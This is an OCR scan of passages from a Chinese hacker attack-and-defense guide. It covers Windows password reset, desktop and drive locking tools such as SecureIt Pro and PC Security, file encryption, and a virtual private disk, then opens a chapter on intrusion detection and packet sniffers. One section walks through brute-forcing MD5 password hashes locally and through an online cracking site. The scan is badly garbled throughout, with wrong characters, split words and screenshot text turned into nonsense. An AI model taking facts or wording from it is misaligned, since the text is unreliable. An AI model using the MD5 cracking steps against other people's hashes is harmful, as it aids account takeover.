的 用 户 账户 。 确 ， 单 击 “ 确 定 ” 按 钮 。 
STEP10: 选择 重 设 密码 STEP1T 单 击 “ 下 一 步 ”按钮 


此 状况 多， 无 法 登录 ， 此 [9] 导 


2 


[en 
sa | ES 7 


En bE bl 
重 讼 密码 时 臣 
Ly 





= 





单 击 “ 重 设 密码 ”链接 ， 选 择 重 新 设置 登录 密码 。 单 击 “ 下 一 步 ” 按 乌 。 
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EE 
取 Fb 
全- 攻防 从 入 门 到 精通 


ss 
SS 
和合 人 人 他 


STEP12: 选择 密 钥 盘 所 在 位 置 STEP13: 设置 新 密码 





插入 密码 重 置 盘 重 置 用 户 帐户 密码 
向 号 将 使 用 磁盘 中 的 信息 来 帮助 您 重 置 密码 。 您 将 可 以 用 新 密码 登录 到 此 用 户 帐户 。 





选择 一 个 密 密 
名 民有 全 做 信 必 持 示 车 新 密码 。 此 密码 将 车 换 旧 的 密码 ， 此 帐户 的 所 














密码 密 钥 盘 在 下 面 的 驱动 器 中 加 ): 输入 新 密码 
全 当当 党 吉 当当 仙 刷 
SET 
各 镶 蕊 委 称 电 久 图 入 
输入 一 个 密码 提示 : 
选择 密码 密 钥 盘 单 击 “ 下 一 步 ” 轩 输入 新 密码 以 及 单 击 “ 下 一 步 " 
所 在 的 位 置 。 按钮 。 密码 提示 。 按钮 。 
STEP14: 完成 窗 码 重 置 STEP15: 输入 新 密码 


正在 完成 密码 重 置 向 导 


咱 急 此 用 户 帐户 成 功 重 置 了 密码 。 您 将 可 以 用 此 


所 
人 


若 要 天 闭 此 回 导 ， 请 单 击 “ 完 成 ”。 





林 岳 用 户 (V) 





单 击 “ 完 成 ”按钮 。 输入 新 密码 。 单 击 “ 登 录 ” 按钮 
即 可 进入 系统 桌面 。 


8.43 ”使 用 $ecurelt Pr0 给 系统 桌面 加 把 超级 锁 


为 了 避免 他 人 操作 目 己 的 计算 机 ， 用 户 可 使 用 条 面 锁 软 件 SecureIt Pro 来 解决 这 个 
问题 。 该 软件 可 以 让 任何 人 (包括 用 户 自己 ) 都 无 法 在 没有 输入 正确 密码 的 情况 下 使 用 
计算 机 。 

1. 生成 后 门口 令 

软件 为 了 防止 用 户 态 记 设 置 的 进入 口令 ,因此 在 开始 使 用 Securelt Pro 亲 ， 需 要 先 填 一 
些 基 本 信息 ， 并 根据 这 些 信 息 目 动 生成 一 个 后 门口 令 ， 在 万 不 得 已 时 登录 使 用 。 

基体 的 操作 步骤 如 下 。 
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STEP01: 双击 “Securelt Pro” 图 标 STEP02: 查看 初始 化 信息 





和 You must agree to be bound by the terms of the following End Users License Agreement before you can use Re 
Welcome to Securelt Pro's First Time Initialization 


this software. Pead the agreement carefully and select an option below, This screen will not appear again. 


The purpose of this one-time initialization is for Securelt Pro to gather some basic information about you. so that in 
case Securadlt Pro disallows you to unlock your computer, you can use a special back door feature to unlock it. 


IMPORTANT - BEAD THE FOLLOWING CAREFULLY . This Quantrix End User License 点 greemenht 
("License" from hereon in] is a legal agreement between you [either an individual or a single entity] and 司 
Quantrix Corporation (proprietary to Danny Liu) for the Quantrix Software product this License Was 一 
distributed with, which includes computer software and may include associated media, printed matelials, 

and electronic documentation ("Software" from hereon in]. By installing, copying, or otherwise using the 
Software product. you agree to be bound by the Terms of this License. |f you do not agree to the Terms of 
this License, do not install or use the Software product. 


§) Securelt Pro will now guide you through the initialization tasks. Please note that you will be asked personal details 
ike Name, Date of Birth, and Place of Birth. 


Please press Next to continue. 


This License grants You, the user [User or "You" from hereon in] a norrexclusive License to use 
Quantrig Software products on the Terms and Conditions of this License 中 at folow: 


In order to use this software you must agree to be bound by the terms of the above License Agreement. Do 
you agree to be bound by the terms of the above License Agreement? 











全 No.,| do not agree to be bound by the terms of the License Agreement Continue 







选择 第 一 个 单 选 按钮 , 同意 许可 协议 , 单 击 “Continue” 
按钮 。 


STEP03: 填写 注册 信息 





Please enter your details below. Please be exact when entering the below information -it will be required if you are Your personalzed back door code is usedif you are locked out of your computer You will be asked to enter this 
locked out of your computer Incorect information could potentially render the back door useless. 3 p09 en with your details in order to regain access to your computer. Make sure you remember this code or 
wilte lt down. 











从 Given Namols}. [0 : 个 Personalized Backdoor Code: [ICROIEZ50GGJXYNBERCXZ0 
ee 人 Ce Please wiite down this code and keep it in a safe place. You will need this code if you ever run into strife with 
Date of Birth: [Januaty 下 | [2 ”| [200 Securelt Pro. Do NOT disclose this code to anybody - people who know this code may be able to activate the 


back door. 
泡 Place of Bith: |LKJ Wirite this code down and keep it in a safe place. 























单 击 “Next” 按 钮 。 单 击 “Next” 按 钮 。 
STEP05: 填写 前 面 自动 生成 的 后 门口 令 STEP06: 初始 化 完成 


本 Securelt Pro First Time 1 








Quantrg can better assist you in lockout issues if you provide us with the given information. 


铂 Initialization complete. You can now start using Securelt Pro. 


Dt course. this is purely voluntary You do NOT have to send this information to Quantrix if you do not wish to do 
30. 








For security's sake, please type in your backdoor code below to confim it: 
办 Thankyou for your bme. Click the large button below to start using Securelt Pro. 


Please note: To access Securelt Pro's back door function in the event of 
lockout. Shift+CtrlzRightClick the lock symbol at the top left-hand corner 
the Main Interface. 





一 一 一 一 一 一 一 一 一 一 一 一 一 一 


Please keep this code in a safe place. Remember how you entered your personal details too - | 


Remeber this. because Quantriz will not release this 
activate the back door feature. they must be entered exactly as they have been entered. 


information to any users! 




















单 击 “Next” 按 钮 。 单 击 右 下 角 的 回 按 钮 。 
STEP07: 查看 提示 信息 


0 The information you have entered cannot be changed once 
和 finalized. Ensure that everything you have entered is correct. You 
will not be able to change this information later. 


提示 “已 输入 的 信息 不 能 更 改 ， 是 否 继续 ? ”， 单 
击 “ 是 ”按钮 ， 即 完成 整个 初始 化 操作 。 


Are you sure you wish to proceed? 





在 因 遗 所 密码 而 被 锁定 时 ， 如 果 想 使 用 后 门口 邻 ， 请 使 用 〈Shift+Ctrl 》 组 


注意 合 键 并 右 击 Securelt Pro 程序 主 界面 左上 角 的 锁定 标记 镯 . 
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| 二 = | | 

取 Pe > 
用 攻防 从 入 门 到 精通 
小 全 人 人 他 





2. 设置 登录 口令 
在 开始 使 用 Securelt Pro 之 前 ， 先 要 设置 进入 的 口令 。 这样 以 后 才能 利用 这 个 口令 来 锁 
定 计 算 机 或 开局 这 个 锁 。 有 具体 的 操作 步骤 如 下 。 


STEP01: 再 次 双击 “Securelt Pro” 图 标 STEP02: 再 次 输入 口令 


站 Securelt Pro 









































在 “Password 文本 框 中 输入 口令 , 单 击 “Lock” ”在 文本 框 中 输入 相同 口令 后 ， 单 击 “OK” 按钮 就 可 
按钮 。 以 使 计算 机 进入 锁定 状态 。 


3. 如 何 解 锁 

在 锁定 状态 下 ， 他 人 只 能 在 果 面 上 看 到 
一 个 “Securelt Pro-Locked” 窗 口 ， 如 右 图 所 
未 ， 其 他 信息 (如 原 有 程序 ) 都 呈现 不 可 见 
状态 。 任 何人 都 必须 输入 正确 口令 并 单 击 
“Unlock” 按 钮 才能 进入 计算 机 。 他 人 也 不 可 
以 给 计算 机 设 定 锁定 状态 的 用 户 留 言 ， 当 用 You can leave a message for the user who locked Securelt Pro below: 


户 回 到 计算 机 后 ， 就 能 查看 这 些 留 言 。 | 


Message: ] 





























8.4.4 ”系统 全 面 加 密 大 师 
PC Security 





系统 级 的 加 密 工 具 PC Security 可 以 帮助 
用 户 锁定 因特网 、 任 何 文件 与 目 了 未 、 任 何 磁盘 分 区 、 系 统 等 ， 其 加 密 管理 功能 非 钊 完善 。 

1. 锁定 驱动 器 

使 用 PC Security 锁定 张 动 器 的 操作 很 简单 ， 下 面 以 锁定 存储 有 重要 文件 的 D 熏 为 例 ， 
在 PC Security 安装 完毕 后 , 在 “我 的 计算 机 ”窗口 中 右 击 D 盘 盘 符 , 从 快捷 六 日 中 选择 “PC 
Security”>“Lock” 命 令 ， 即 完成 对 DD 盘 的 锁定 操作 。 

2. 锁定 系统 

PC Security 可 以 实现 多 种 方式 的 系统 锁定 ， 下 面 逐一 进行 讲述 。 

(1) 即时 锁定 系统 

如 采 需 要 和 暂时 离开 计算 机 ， 为 防止 他 人 恶意 操作 目 己 的 计算 机 ， 用 户 可 以 即时 锁定 上 自 
己 的 计算 机 系统 。 有 具体 的 操作 步骤 如 下 。 
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< 全 第 8 章 


密码 攻防 


STEP01: 运行 PC Security 软件 STEP02: PC Security 操作 管理 


Action View Help Register 


全 口 测 回 白 昌 国 宰 电 日 | 和 世人 只 | 志 


Warning: The password is still “SECURITT"，please change it as Soon as possible- 


Password: 
EER 








] 
输入 正确 的 登录 密码 ( 默认 为 Security ) ， 并 单 击 ” 单 击 “System Lock ”( 即 系统 锁定 ) 链接 。 
“ENTER” 按 钮 。 





STEP03: 系统 锁定 








Action View Help Register 


| 和 4 让 讽 外 口 多 国 容 昌 @ 已 多 | 今 妇 | 单 击 “Lock the Computer Now” 按 钮 , 当前 系统 
ock Schedie 将 自动 切换 到 类 似 屏幕 保护 的 状态 。 之 后 ， 只 有 和 输 


厂 Lock After |30 "| in-active minutes 


Tsao 入 了 PC Security 的 登录 密码 才能 恢复 系统 的 正常 使 


I¥ Monitor Mouse Moves 用 状 SS 
厂 Ask Password for Shutdown NO 


画 A 
Hot Key. 
无 Set Hot Key 








Restricted System Off Security On 


(2) 启动 时 锁定 系统 

采用 启动 时 锁定 系统 功能 ， 可 彻底 解决 Windows 7 系统 不 需要 密码 就 登录 系统 的 安全 
隐患 ， 在 该 功能 启用 后 ， 当 用 户 登 录 Windows 7 系统 时 ， 在 “登录 ”对 话 框 中 单 击 “ 确 定 ” 
按钮 ， 将 会 自动 进入 类 似 屏 幕 保护 状态 的 PC Security 登录 状态 。 方 法 很 简单 ， 只 需 勾 选 
“系统 锁定 ”界面 中 的 “Lock on Startup” 复 选 枉 即 可 ， 如 下 左 图 所 示 。 

(3) 指定 时 间 锁 系统 

勺 选 “Lock After…in-active minutes” 复 选 框 ， 如 下 右 图 所 示 ， 在 数值 框 中 输入 所 需 的 
数字 后 ，PC Security 就 会 目 动 在 指定 的 无 操作 持续 时 间 后 将 系统 锁定 。 


| @) System Lock - PC Security(tm) ETE) [sn ity(tm) ET 




















Action View Help Register | 


‖ 各 口 负 回 白 昌国 空 曙 @ 和 | 世 昌 队 | 知 


| Action View Help 。 Register 


| 委 口 油 四 后 昌 国富 昌 昌 久 节 电 队 寺 





Lock Schedule 三 N 
I¥ Use Lock Scheduler: Lockthe ComputerNow | 


Saturday, Sunday 
国 


广 Lock Schedule 
I[¥ UseLock Scheduler' Lockthe ComputerNon | 


Monday - Friday Saturday, Sunday 厂 Lock After | 30 加 in-active minutes 




















Set Hot Key 
Set Hot Key | 























勾 选 “Lock on Startup” 复 选 框 。 勾 选 “Lock After .…. in-active minutes” 复 选 框 。 


2 





二 = | 
黑客 
: | 六 考 3 
关 肛 = 一 全- 攻防 从 入 门 到 精通 
(4) 锁定 活动 窗口 
假设 用 户 在 运行 程序 时 有 朋友 要 借用 一 下 计算 机 , 用 户 不 希望 将 正在 运行 的 程序 关闭 ， 
但 又 不 想 让 朋友 打开 正在 运行 的 程序 。 这 个 看 起 来 很 及 烦 的 问题 ， 通 过 PC Security 将 会 很 
容易 地 解决 。 具 体 的 操作 步骤 如 下 。 


STEP01: 返回 操作 管理 界面 STEP02: 打开 “Lock Security” 界 面 




















回 Home Page - PC Security(tm) 
Action View Help Register 


借口 泗 回 口 涩 国富 电 9 时 久 闪 和 


[加 window Lock - PC Securityt Eales 
Action View Help 


| Register 
开口 | 浇 习 品 当 园 写 外 对 时 | 信 愉 i 
Tile Search Sting [Lock Security| Se Lock Type 





Bemove Selected 
位 Disable 

© Invisble 

© Ask For Password 
© Always Close 


厂 Search Child Windows ‘Wat Time: |5. Seconds 
Window Titles Found Lock Type Win Handle 





Locked Windows:; 


Relock Window 
Unlock Window 


里 Y 
STEALTHKENCRYPTOR 
f 丰 








Locks this program Restricted System Off Security On 


单 击 “Window Lock ”链接 。 
STEP03: 添加 一 个 搜索 标题 STEP04: 返回 “Lock Security” 界 面 





Add a Title Search String... ee ee ee 
| Action View He ister 


| 开口 | 浇 习 中 多 国 容 钨 9%@R# 





Tile Search Suing Lock Type 
A 沽 会 计 者 试 文 流 群 Disable 
Pick a title or an already existIng window from the 
drop down list or type your own and hit enter. 


厂 Search Child windows 





单 击 右 侧 的 下 三 角 按 钮 ， 单 击 "OK” 图 选择 "Disable" 单 击 “Relock Window” 

在 当前 运行 程序 列表 中 选择 按钮 。 或 “Invisible ”等 单 ”按钮 ， 可 看 到 选中 的 程序 绚 

要 锁定 的 程序 。 选 按钮。 表 ， 以 及 当前 程序 为 禁止 使 
用 状态 。 


(5) 锁定 程序 

如 果 系 统 中 有 一 些 很 重要 的 程序 不 方便 让 其 他 用 户 使 用 , 也 可 以 使 用 PC Security 将 程 
序 锁定 。 在 登录 操作 管理 界面 中 单 击 “Program Lock”( 程 序 锁定 ) 链接 ， 即 可 打开 “程序 
锁定 ”设置 界面 。 选 中 需要 锁定 的 程序 ， 单 击 中 间 的 锁定 方式 《只 恋 或 完全 )， 单 击 “Lock” 
按钮 ， 即 可 锁定 程序 。 

3. 验证 加 密 效 果 

锁定 目录 对 于 非法 用 户 究 昔 有 没有 访问 约束 力 呢 ?这 里 通过 实例 介绍 ， 先 使 用 PC 
Security 将 服务 器 的 D 盘 下 的 IMA 目录 锁定 ， 通 过 局 域 网 中 的 男 一 台 计 算 机 对 服务 器 进行 
木马 控制 ， 此 时 会 发 现 远 程控 制 对 于 服务 右 中 锁定 的 IMA 目录 无 法 谈 取 。 
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如 果 和 恶意 用 户 想 通过 网 络 将 PC Security 凶 载 后 进行 信息 鳃 取 ， 则 他 们 可 能 将 会 非常 失 
望 ， 因 为 PC Security 必须 在 输入 密 人 码 后 才 可 加 载 。 


EE: 解 环 工 县 





8.9.1 “加 客 精灵 ”加 窗 工 具 


加 密 精 天 是 一 球 加 窗 速 度 极 快 且 功能 强大 的 国产 加 密 工 具 ， 可 用 于 加 密 任何 格式 的 文 
件 ， 几 乎 集成 了 当前 所 有 加 密 工具 的 功能 。 
利用 加 密 精 姑 加 密 文 件 的 其 体 步 又 如 下 。 


STEP01: 运行 加 密 精 只 加 BU2 开始 加 密 














镁 入 密码 
确认 密码 





决 速 加 密 三 移动 加 密 三 家 全 吉 密 





-辅助 功能 区 


登陆 管理 | 更 换 皮 肤 | 高 级 

















单 击 “ 浏 览 ”按钮 单 击 “加密 ” 国 输入 密码 并 先 单 击 “提交 
选择 要 加 密 的 文件 。 按钮 。 择 加 密 类 型 。 按钮 。 


STEP03: ”加密 完成 


选择 文 件 夹 

文件 夹 路 径 E: ‘Progran Files Ct 

一 主 功能 区 
加 密 | 隐藏 | 伪装 | 粉碎 | 解密 | 

-辅助 功能 区 
登陆 管理 | 更 换 皮 肤 | 高 级 | 注册 | 退出 | 

一 已 加 密 文 件 夹 列 表 [ 解 密 时 点 击 文件 来 路 径 项 , 则 选中 ] = 


人 给 一 一 盖 一 一 一 时 在 已 加 密 文件 夹 列 表 中 可 以 查看 已 经 加 密 的 文件 夹 。 



























































解密 的 过 程 与 加 密 过 程 相 似 ， 其 体 步 又 如 下 。 
STEP01: 打开 主 界 面 STEP02: 开始 解密 








一 主 功 能 区 
加 密 | 
-辅助 功能 区 
登陆 管理 | 























国 单 击 “浏览 ”按钮 ， 国 单 击 “解密 ” 输入 密码 并 单 击 “ 提 交 ” 按 钮 。 
选择 要 解密 的 文件 。 按钮 。 
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8.5;2 ”MD5 加 密 解 密实 例 


MD5 (Message-digest Algorithm 5, 信息 -摘要 算法 ) 密码 转换 器 主要 是 对 数据 进行 MD5 
算法 转换 ，ASP 数据 库 几 乎 都 是 这 样 加 蜜 的 ， 虽 然 解 密 比 较 困 难 ， 但 因 其 强大 的 字典 而 解密 
效果 不 错 ， 而 且 使 用 这 个 软件 加 窗 的 密码 很 少 有 人 能 猜 出 来 。 随 看 MD5 密码 的 流行 ， 人 破解 
MD5 的 方法 也 是 越 来 越 多 ,下 和 耐 从 本 地 和 网 络 两 种 方式 来 讲述 MD5 是 如 何 实现 暴力 破解 的 。 

1. PKmds 加 窗 

使 用 PKmd5 可 以 很 方便 地 将 一 组 字符 用 MD5 方式 完成 加 密 ， 具 体 的 操作 方法 如 下 。 


STEP01: 运行 PKmd5 STEP02: 开始 加 密 




















刻 PKmd5 By: 薄 乐天 QQ:1477696708 





过 加 似 确 功 : 123456 2013/12/17 11:24:43 





单 击 “MD5 加 密 ” 按 钮 。 在 “MD5 加 密 " 单 击 “ 一 键 加 密 ” 按 
文本 框 中 输入 要 转 钮 ， 加 密 后 的 密 文 将 显示 
换 的 字符 。 在 “加 密 效果 "文本 框 中 。 


2. 本 地 破解 MD5 
使 用 MD5 进行 密码 破解 的 具体 操作 步骤 如 下 。 


STEP01: 打开 PKmd5 STEP02: MD5 解密 


表 PKmd5 By: 薄 乐天 QQ:1477696708 





49BA59ABBE565057 
破解 方式 : 他 要 速 破解 | 标准 破解 首 伺 语 训 | 
范围 设置 慰 软 件 仅 能 破解 二 数字 的 HD5 密 文 ) 
起 始 信 , 00” ”终止 信 , osm 解码 数 ,人 
单 击 “MD5 解 密 ” 按 钮 。 输入 要 破解 的 MD5 密 Me 屿 。 
码 ， 并 选择 破解 方式 。 密 ” 按 钮 。 
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STEP03: 查看 解密 结果 


可 pkmd5 By 泣 乐 天 QQ:1477696708 


| 功能 帮助 
-MDS5 解 密 一 一 一 一 一 一 


[a9BAG OABBES6EO5T 





破解 方式 : 个 极 束 破解 ”全 标准 破解 
范 赎 设置 [未 软件 倪 能 破解 纯 数 字 的 MD5 密 文 ) 


起 始 值 : 乓 23456 化 止 值 :[559999 解码 数 :|869999 


初始 化 数据 守成 ! 共 899939 个 猜 解 码 
正在 解密 请 稍 候 .. 在 下 方 文本 框 中 查看 解密 结果 。 


4 解密 成 功 : 123456 201321128 16:17:58 





3. 在 线 破解 MDS 
相对 于 本 地 密码 破解 ， 网 上 在 线 人 破解 束 容 易 得 多 了 ， 现 在 也 有 很 多 能 够 在 线 人 破解 MD5 
的 网 站 (如 http:/www.xmd5.org/ 束 是 个 很 受 欢迎 的 MD5 在 线 人 破解 网 站 )。 


STEP01: 打开 IE 浏览 器 STEP02: MD5 解密 








页 面 (P) ~ ”安全 (S) x” 工具 (0) ~ 碟 ~ 


过 把 hao123 设 为 主页 





在 地 址 栏 中 输入 “ http:/www.xmd5.org/” 后 按 ”将 要 破解 的 MD5 密 文 输入 到 文本 框 中 ,然后 单 击 
(Enter) 键 。 “MD5 人 解密” 按钮 。 


STEP03: 查看 破解 结果 


在 “MD5 解 密 ”按钮 下 方 会 出 现 解密 结果 。 


也 吕 RE 二 
2005 一 2 g 使 用 jamd5 前 攻读 





8.5.3 用 “私人 磁盘 ” 隐 纠 大 文件 
“私人 磁盘 ” 软件 是 一 款 极 好 的 文件 和 文件 夹 加 密 保护 工具 ， 能 够 在 各 个 硬盘 分 区 中 创 


pa 











取 | > 
用 攻防 从 入 门 到 精通 
小 全 人 人 他 


建 加 密 区 瑾 ， 并 将 加 密 区 虚拟 成 一 个 磁盘 分 区 以 供 使 用 。 该 虚拟 的 磁盘 分 区 和 实际 的 磁盘 
分 区 完全 一 样 。 用 户 可 以 在 其 中 存放 文件 资料 ， 也 可 以 将 软件 、 游 戏 安装 在 里 面 。 





1. “私人 磁盘 ”的 创建 





“私人 磁盘 ”为 绿色 软件 ， 下 载 并 解压 后 ， 直 接 双 击 即 可 进入 主 操作 界面 执行 相应 的 操 
作 ， 包 括 创 建 、 删 除 、 打 开 、 修 改 、 关 闭 私人 磁盘 等 操作 。 


创建 “私人 磁盘 ”的 具体 操作 步骤 如 下 。 


STEP01: 运行 私人 磁盘 程序 


全 私人 磁盘 专业 版 








欢迎 使 用 私人 磁盘 
请 输入 密码 :| | 

















初始 密码 为 空 ， 无 需 输入 密码 ， 直 接 单 击 “ 确 定 ， 
按钮。 


STEP03: 切换 到 完整 主 界 面 





创建 私人 磁 二 | 后 除 私 估 谱 二 
条 开 私人 磁 码 | 侨 亲 私人 磁 辆 
从 改 矶 香 密 到 | 旬 人 碰 盘 设 辐 
乐 统 去 全 设 恒 | 旬 人 瑞生 工 月 





壬 完整 主 界面 中 进行 用 户 名 密码 设置 。 


STEP05: ”私人 磁盘 创建 完成 
© 
私人 了 梯 盘 文件 列表 G 击 建立 、 打开) 

Be 


区 [J] 





全 建 私人 磋 般 俐 除 私人 磅 前 


用 开 私人 说 出 医 闭 私人 磁盘 
息 改 磊 盘 室友 多 人 磁盘 设 罩 





问 局 用 移动 基肥 
完成 私人 磁盘 创建 的 分 区 卷 标 右 侧 会 出 现 “ 充 ?” 


标志 。 
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STEP02: 打开 微型 主 界 面 


私人 磁盘 文件 列表 叹 击 建立 、 打开) 





界面 中 列 出 了 现 有 的 磁盘 分 区 ， 单 击 标题 栏 的 “ 变 ” 
按钮 。 


STEP04: 创建 私人 磁盘 


日 
私信 醚 盘 文 件 列表 G 击 建立 、 打 开 ) 


便 除 私人 成 芭 
行 开 利 人 磁 融 医 闭 私人 磁 动 
和 改 习 盘 密码 | 私人 成 盘 设 一 
条 统 半 全 设置 有 很 人 开盘 工 司 





加 百 用 移动 章 支 持 


选择 准备 在 哪个 分 单 击 “ 创 建 私人 
区 上 创建 私人 磁盘 。 磁盘 ”按钮 。 


STEP06: 查看 生成 的 私人 磁 姐 


文件 (日 ” 据 缠 ()” 重 看 (VV) 工 晨 中 ”帮助 (H) 
姐 织 系统 属性 部 加 或 更 改 程序 耽 射 网 络 范 动 蕊 打开 控制 面板 
由 下 载 
凤 点 面 
关 最 近 访 问 的 位 置 








单 击 "打开 私人 磁盘 ”按钮 或 “我 的 电脑 ”, 发 现 
多 出 了 两 个 磁盘 分 区 ， 磁 盘 分 区 G 和 |。 
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1 ) 一 个 分 区 上 只 能 创建 一 个 私人 磁盘 ， 如 果 创 建 多 个 ， 会 出 现 出 错 
提示 。 
2 ) 由 于 私人 磁盘 空间 是 从 各 个 磁盘 分 区 中 的 剩余 空间 中 分 离 出 来 的 ,因此 


私人 磁盘 的 个 数 和 大 小 受 实 际 分 区 和 所 剩 空间 的 限制 。 
3 ) 虚拟 的 磁盘 分 区 供 使 用 时 文件 操作 和 普通 磁盘 相同 ， 只 是 不 能 进行 “ 格 
开化 操作 





STEP07: 返回 完整 主 界 面 STEP08: 私人 磁盘 设置 








个 打开 私人 磁盘 时 使 用 回 定 盘 符 : 


f 由 程序 自动 分 配 私 人 磁盘 盘 符 
创建 私人 磋 友 全 除 私人 磁 坦 符 


大 创建 私 和 磁盘 文件 时 不 及 丰 密 码 


艇 改 访 盘 宣 码 
全 多 计 各 个 私人 了 虞 盘 分 别 仙 站 密码 


你 统 支 全 设 国 | 介 人 磁盘 工 朋 
《 郑 载 本 软件 外 | 人 软件 注册 


入 开 私人 开盘 侨 闭 私人 磁 奏 区 





人 软件 官网 了 | 人 退出 程序 





单 击 “ 私 人 磁盘 设置 ”按钮 。 进行 盘 符 设置 、 私 人 磁盘 密码 设置 等 。 
2. “私人 磁盘 ”的 删除 
删除 创建 的 稚 人 磁盘 的 方法 和 创建 私人 磁盘 的 方法 正好 相反 。 有 基体 的 操作 步骤 如 下 。 
在 主 界 面 中 选择 要 删除 的 私 人 磁盘 ， 单 击 主 界面 中 “操作 选择 ”选项 组 中 的 “删除 私 
人 磁盘” 按钮 ， 即 弹出 “确认 ”提示 框 ， 拓 示 是 人 耕 删 除 ， 如 下 图 所 示 。 如 果 确 定 要 删除 ， 
则 单 击 “ 是 ”按钮 。 这 个 操作 会 删除 所 有 存在 私人 磁盘 里 的 文件 ， 所 以 一 定 要 齐 居 。 将 私 
人 磁盘 删除 后 打开 “我 的 计算 机 ” 即 可 看 到 所 创建 的 私人 磁盘 已 经 消失 。 


确认 a 枉 二 








@ 在 私人 磁 和 一 中 的 所 有 操作 都 与 
普通 分 区 中 的 操作 相同 。 删 除 私人 磁 


所 示 。 盘 中 的 文件 同样 要 经 过 “回收 站 ”。 
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黑客 入 侵 检 测 技 术 


入 侵 检测 技术 可 实时 监控 网 络 传输 ， 自 动 检测 可 妖 行 为， 分 析 来 自 网 络 外 
部 入 侵 信号 和 内 部 的 非法 活动 ， 在 系统 受到 危害 前 发 出 警告 ， 对 攻击 作出 实时 
的 响应 ， 并 提供 补救 措施 ， 最 大 限度 地 保障 系统 安全 。 


O 〇 基于 网 络 的 入 侵 检 测 系统 
O 基于 主机 的 入 侵 检 测 系统 
O 〇 基于 漏洞 的 入 侵 检 测 系统 
〇 萨 客 晰 入 侵 检 测 系 统 
O Snort 入 侵 检 测 系 统 
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黑客 入 侵 检 测 技 术 


9.1 入 侵 检 疯 概述 


所 谓 入 侵 检测 ， 是 指 试图 监视 和 尽 可 能 阻止 有 害 信息 的 入 侵 或 其 他 能 够 对 用 户 的 系统 
和 网 络 资源 产生 危害 的 行为 。 简 单 地 说 ， 它 是 这 样 工 作 的 : 用 户 有 一 个 计算 机 系统 ， 它 与 
网 络 连 接着 ， 也 许 也 同 互 联网 连接 。 由 于 一 些 原因 ， 人 允许 网 络 上 的 授权 用 户 访问 该 计算 机 。 
比如 说 ， 有 一 个 连接 看 互联 网 的 Web 服务 器 ， 人 允许 目 己 的 客户 、 员 工 和 一 些 潜在 的 客户 ， 
访问 存放 在 该 Web 服务 器 上 的 Web 页 面 。 
入 侵 检 测 可 以 采取 更 多 的 措施 ， 大 致 有 以 下 两 种 。 
@ 在 防火 墙 和 一 个 安全 系统 之 间 放 置 基于 网 络 的 入 侵 检 测 系 统 ， 就 能 够 给 该 系统 提供 
另外 层次 的 保护 。 
@ 监视 来 日 互联 网 的 对 安全 系统 的 敏感 数据 闹 口 的 访问 ， 可 以 判断 防火 墙 是 否 被 攻 
破 , 或 是 否 末 取 一 种 未 知 的 技巧 来 绕 过 防火 墙 的 安全 机 制 , 从 而 访问 被 保护 的 网 络 。 
入 侵 检 测 系统 分 为 基于 网 络 的 入 侵 检 测 系统 、 基 于 主机 的 入 侵 检 测 系统 和 基于 漏洞 的 
入 侵 检 测 系统 3 种 类 型 。 



































9.2 基于 网 络 的 入 侵 检 测 系 统 


基于 网 络 的 入 侵 检 测 ， 这 种 类 型 一 般 安 猴 在 需要 保护 的 网 段 中 ， 利 用 网 络 侦 听 扩 术 
实时 监视 网 段 中 传输 的 各 种 数据 包 ， 并 对 这 些 数据 包 的 内 容 、 源 地 址 、 目 的 地 址 等 进行 
分 机 和 检测 。 如 果 发 现 入 侵 行 为 或 可 颖 事件， 入 侵 检 训 系 统 驶 会 发 出 警报 甚至 切断 网 络 
连接 ， 其 整个 入 侵 检 测 结 构 如 下 图 所 示 。 网 络 接口 卡 (NIC) 可 以 在 如 下 两 种 模式 下 
ES 











网 络 接口 


基于 网 络 的 入 侵 检 测 结 构 


@ 正常 模式 。 和 需要 发 送 同 计算 机 (通过 包 的 以 太 网 或 MAC 地 址 进行 判断 的 数据 包 ， 
系统 通过 该 主机 进行 中 继 转 发 。 
@ 混 林 模式 。 此 时 以 太 网 上 所 能 见 到 的 数据 包 都 问 该 主机 系统 中 继 。 
一 块 网 卡 可 以 从 正 第 模式 癌 混杂 模式 转换 ， 通 过 使 用 操作 系统 的 压 层 功能 束 能 直接 告 
诉 网 卡 进行 如 此 改变 。 通 第 ， 基 于 网 络 的 入 侵 检 测 系 统 要 求 网 卡 处 于 混杂 模式 。 
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EE 
取 > 
示 


Py 
全- 攻防 从 入 门 到 精通 


售 人 他 他 





9.2:1 包 嗣 探 器 和 网 络 监视 器 


包 别 探 融 和 网 络 监视 器 的 最 初 设 计 目 的 是 帮助 监视 以 太 网 络 的 通信 。 最早 有 两 种 产品 : 
Novell LANalyser 和 [M$] Network Monitor。 这 些 产 品 可 以 抓获 网 络 上 能 够 看 到 的 所 有 包 ， 
一 旦 抓获 了 这 些 数 据 包 ， 残 可 以 进行 如 下 的 工作 。 

@ 对 包 进 行 统 计 。 统 计 通 过 的 数据 包 ， 并 统计 该 时 期 内 通过 的 数据 包 的 总 的 大 小 ( 包 
括 总 的 开销 ， 例 如 包 的 报头 )， 可 很 好 地 知道 网 络 的 负载 状况 。LANalyser 和 [MS] 
Network Monitor 都 提供 了 网 络 相 关 人 负载 的 图 形 化 或 图 表 表 现形 式 。 

@ 详细 地 检查 包 。 如 可 抓获 一 系列 到 达 Web 服务 器 的 数据 包 来 诊断 服务 器 的 问题 。 

近年 来 ， 包 唱 探 产品 已 经 成 了 独立 的 产品 。 程 序 (例如 Ethereal 和 Network Monitor 的 
最 新 版 本 ) 可 以 对 内 部 各 种 类 型 的 包 进 行 拆 分 ， 从 而 可 以 知道 包 内 部 发 生 了 什么 类 型 的 通 
信 。 这 些 工具 同时 也 能 被 用 来 进行 破坏 活动 。 


9.2:2 包 了 晶 探 器 和 混杂 模式 


所 有 的 包 嘿 控 融 都 要 求 网 络 接口 运行 在 混杂 模式 下 。 只 有 运行 在 混杂 模式 下 ， 包 中 探 
胡 才 能 接收 通过 网 络 接口 卡 的 每 个 包 。 在 安装 包 咒 探 器 的 机 右上 运行 包 咒 探 高 通常 需要 省 
理 员 的 权限 ， 这 样 ， 网 卡 的 硬件 才能 被 设置 为 混杂 模式 。 

为 外 需要 考虑 的 一 点 是 包 咒 探 右 在 交换 机 上 的 使 用 。 在 一 个 网 络 中 ， 它 比 集 线 右 
使 用 得 更 多 。 注 意 ， 在 交换 机 的 一 个 接口 上 收 到 的 数据 包 不 总 是 被 送 回 交换 机 的 其 他 
接口 的 。 由 于 这 种 原因 ， 包 趾 探 喜 在 交换 网 络 环 境 下 通 季 不 能 正 闻 工作 。 


9.23 ”基于 网 络 的 入 侵 检测 : 包 了 晶 探 器 的 发 展 


